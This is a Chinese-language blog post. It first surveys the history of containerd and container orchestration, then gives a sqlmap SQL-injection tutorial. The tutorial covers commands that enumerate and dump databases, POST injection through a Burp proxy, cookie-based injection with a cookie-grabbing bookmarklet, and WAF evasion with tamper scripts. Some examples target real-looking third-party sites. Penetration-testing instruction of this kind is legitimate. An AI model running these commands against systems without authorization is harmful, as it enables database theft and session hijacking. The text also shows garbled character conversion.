container and injector

Container

 

History：

containerd於2014年出生於Docker，最初是Docker引擎的低層運行時管理器。繼2017年3月被CNCF接受以後，containerd已經成爲一個行業標準的容器運行時，專一於簡單性，健壯性和可移植性，其最普遍的用途和採用是Docker引擎和OCI runc執行器之間的層。containerd可用做Linux和Windows的守護程序。它管理其主機系統的完整容器生命週期，從圖像傳輸和存儲到容器執行和監督，再到低級存儲，再到網絡附件等。

背景：

一、containerd是一個行業標準的容器運行時，強調簡單性，健壯性和可移植性。containerd可用做Linux和Windows的守護程序。

二、containerd管理其主機系統的完整容器生命週期，從圖像傳輸和存儲到容器執行和監督，再到低級存儲，再到網絡附件等。

特徵：

一、OCI Image Spec支持

二、圖像推拉支持

三、用於建立，修改和刪除接口的網絡基元

四、多租戶支持CAS存儲全局圖像

五、OCI運行時規範支持（又名runC）

六、容器運行時和生命週期支持

七、管理網絡名稱空間容器以加入現有名稱空間

future：

截至今天，業界有一個重要的趨勢，即從VM遷移到容器以部署軟件應用程序。其主要緣由是與VM相比，容器提供的靈活性和低成本。谷歌多年來一直使用容器技術與Borg和Omega容器集羣管理平臺大規模運行Google應用程序。更重要的是，Google經過實施cgroup和參與libcontainer項目爲容器空間作出了貢獻。在過去幾年中，Google可能已經在使用容器的性能，資源利用率和總體效率方面得到了巨大的收益。最近，微軟沒有在Windows平臺上進行操做系統級虛擬化，當即採起措施在Windows Server上實現對容器的本機支持。

在生產環境中，Docker、Rocket和其餘容器平臺不能在單個主機上運行，緣由是它們暴露於單個故障點。當一個容器集合在單個主機上運行時，若是主機失敗，在該主機上運行的全部容器也將失敗。爲了不這種狀況，須要使用容器主機集羣。解決這個問題的第一個最開放源碼的容器集羣管理平臺之一是Apache Mesos。它最初是做爲一個研究項目在加州大學伯克利分校開發的，後來在2012年左右轉移到了阿帕奇(Apache)。Google採起了相似的步驟來實現一個先進的、開放源碼的容器集羣管理系統，名爲Kubernetes。Docker還啓動了一個名爲Docker Swarm的解決方案。今天，這些解決方案還處於很是早期的階段，可能須要幾個月才能完成所有功能集，並在生產環境中普遍應用。

微型服務是另外一項突破性的技術，而不是一種使用容器進行部署的軟件體系結構。微服務是一個Web服務的輕量級實現，與標準Web服務相比，它的啓動速度很是快。這是經過在一個服務中打包一個功能單元並將其嵌入到一個輕量級的Web服務器二進制文件中來實現的。

經過考慮上述事實，咱們能夠預測，在將來幾年內，容器可能會佔用虛擬機，有時可能會徹底取代它們。去年，我與一些企業合做，在POC層面實施基於容器的解決方案。不多有人想接受挑戰並將其投入生產。隨着容器集羣管理系統變得更加成熟，這可能會很快發生變化

Injector

 

網上的注入工具不少，大多也有比較詳細的解釋，可是大部分windows下的注入軟件都是對本身軟件的一種推薦，並且不少也不是很是的安全，對於有些破解版原本說，極可能自身會被帶有木馬，因此，Linux下的注入工具也是很是強大的，不過度的說，能夠徹底取代Windows下面的全部注入工具。我所介紹的是一款名爲SQLMAP的注入工具，有感興趣的能夠去他的官網看看哦！

首先，SQLMAP是一個開放源碼的滲透測試工具，它能夠自動探測和利用SQL注入漏洞來接管數據庫服務器。它配備了一個強大的探測引擎，爲最終滲透測試人員提供不少猥瑣的功能，能夠拖庫，能夠訪問底層的文件系統，還能夠經過帶外鏈接執行操做系統上的命令

其次，SQLMAP支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等數據庫的各類安全漏洞檢測。

SQLMAP支持五種不一樣的注入模式：

l  基於布爾的盲注，便可以根據返回頁面判斷條件真假的注入；

l  基於時間的盲注，即不能根據頁面返回內容判斷任何信息，用條件語句查看時間延遲語句是否執行（即頁面返回時間是否增長）來判斷；

l  基於報錯注入，即頁面會返回錯誤信息，或者把注入的語句的結果直接返回在頁面中；

l  聯合查詢注入，可使用union的狀況下的注入；

l  堆查詢注入，能夠同時執行多條語句的執行時的注入

一些簡單的SQLMAP使用：

1. 基礎用法：

一下./sqlmap.py 在kali和backtrack中使用sqlmap的時候，直接用：sqlmap

./sqlmap.py -u 「注入地址」 -v 1 –dbs   // 列舉數據庫

./sqlmap.py -u 「注入地址」 -v 1 –current-db   // 當前數據庫

./sqlmap.py -u 「注入地址」 -v 1 –users    // 列數據庫用戶

./sqlmap.py -u 「注入地址」 -v 1 –current-user  // 當前用戶

./sqlmap.py -u 「注入地址」 -v 1 –tables -D 「數據庫」   // 列舉數據庫的表名

./sqlmap.py -u 「注入地址」 -v 1 –columns -T 「表名」 -D 「數據庫」   // 獲取表的列名

./sqlmap.py -u 「注入地址」 -v 1 –dump -C 「字段,字段」 -T 「表名」 -D 「數據庫」   // 獲取表中的數據，包含列

已經開始拖庫了，SQLMAP是很是人性化的，它會將獲取的數據存儲sqlmap/output/中、、、

2. sqlmap post注入

咱們在使用Sqlmap進行post型注入時， 常常會出現請求遺漏致使注入失敗的狀況。 這裏分享一個小技巧，即結合burpsuite來使用sqlmap， 用這種方法進行post注入測試會更準確，操做起來也很是容易。

　　 1. 瀏覽器打開目標地址http:// www.2cto.com /Login.asp

　　 2. 配置burp代理(127.0.0.1:8080)以攔截請求

　　 3. 點擊login表單的submit按鈕

　　 4. 這時候Burp會攔截到了咱們的登陸POST請求

　　 5. 把這個post請求複製爲txt, 我這命名爲search-test.txt 而後把它放至sqlmap目錄下

　　 6. 運行sqlmap並使用以下命令： ./sqlmap.py -r search-test.txt -p tfUPass

這裏參數-r 是讓sqlmap加載咱們的post請求rsearch-test.txt， 而-p 你們應該比較熟悉，指定注入用的參數。

3.sqlmap  cookies注入

sqlmap.py -u 「http://127.0.0.1/base.php」 –cookies 「id=1″  –dbs –level 2

2. 默認狀況下SQLMAP只支持GET/POST參數的注入測試，可是當使用–level 參數且數值>=2的時候也會檢查cookie時面的參數，當>=3的時候將檢查User-agent和Referer，那麼這就很簡單了，我 們直接在原有的基礎上面加上 –level 2 便可

利用sqlmap cookies注入突破用戶登陸繼續注入 先把用戶登錄的cookie拿到吧， 在收藏夾添加一個連接cookies屬性： 名字本身取 javascript:alert(document.cookie)，，須要獲取當前cookie的時候， 直接點一下這個連接，而後複製一下彈出對話框 裏的cookie值就搞定了

sqlmap.py -u http://x.x.x.x/Down.aspx?tid=2 -p tid –dbms mssql –cookie=」info=username=test」

-p是指指定參數注入

4. sqlmap遇到url重寫的注入

哪裏存在注入就加上 * 號 1 ./sqlmap.py -u 「http://www.cunlide.com/id1/1*/id2/2「

5.sqlmap 編碼繞waf注入

./sqlmap.py -u http://127.0.0.1/test.php?id=1 -v 3 –dbms 「MySQL」 –technique U -p id –batch –tamper 「space2morehash.py」

在sqlmap 的 tamper目錄下有不少space2morehash.py 編碼腳本自行加載